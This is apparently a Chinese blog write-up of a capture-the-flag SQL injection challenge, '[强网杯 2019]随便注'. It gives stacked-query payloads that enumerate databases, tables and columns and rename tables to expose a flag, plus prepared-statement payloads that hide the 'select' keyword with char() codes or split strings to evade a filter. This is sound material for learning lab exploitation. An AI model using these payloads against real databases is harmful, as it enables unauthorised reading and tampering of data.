[强网杯 2019]随便注

本文介绍了MySQL数据库的SQL注入漏洞利用方法,包括爆库、爆表、爆字段名及修改表名和列属性的语法。同时,展示了三种预处理SQL语句的执行方式,并提供了相关参考资料,旨在揭示SQL注入的危害,提醒读者关注数据库安全。

BUUCTF刷题记录

[强网杯 2019]随便注

在这里插入图片描述

爆库
1’;show databases;#
在这里插入图片描述
爆表
1’;show tables;#
在这里插入图片描述
爆字段名
1’;show columns from 1919810931114514;#
在这里插入图片描述
修改表名的语法:alter table rename to/as new_tablename;
修改列的属性:table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL

貌似得一次性来??分开不行

0';rename table words to words2;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

贴一个预处理的方法

第一种
PREPARE name from '[my sql sequece]';   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL        语句
第二种
SET @tn = 'hahaha';  //存储表名
SET @sql = concat('select * from ', @tn);  //存储SQL语句
PREPARE name from @sql;   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

解3种食用方式

1';PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#


1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE hacker from @sqli;EXECUTE hacker;#

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

参考:

https://www.cnblogs.com/wjw-zm/p/12359735.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值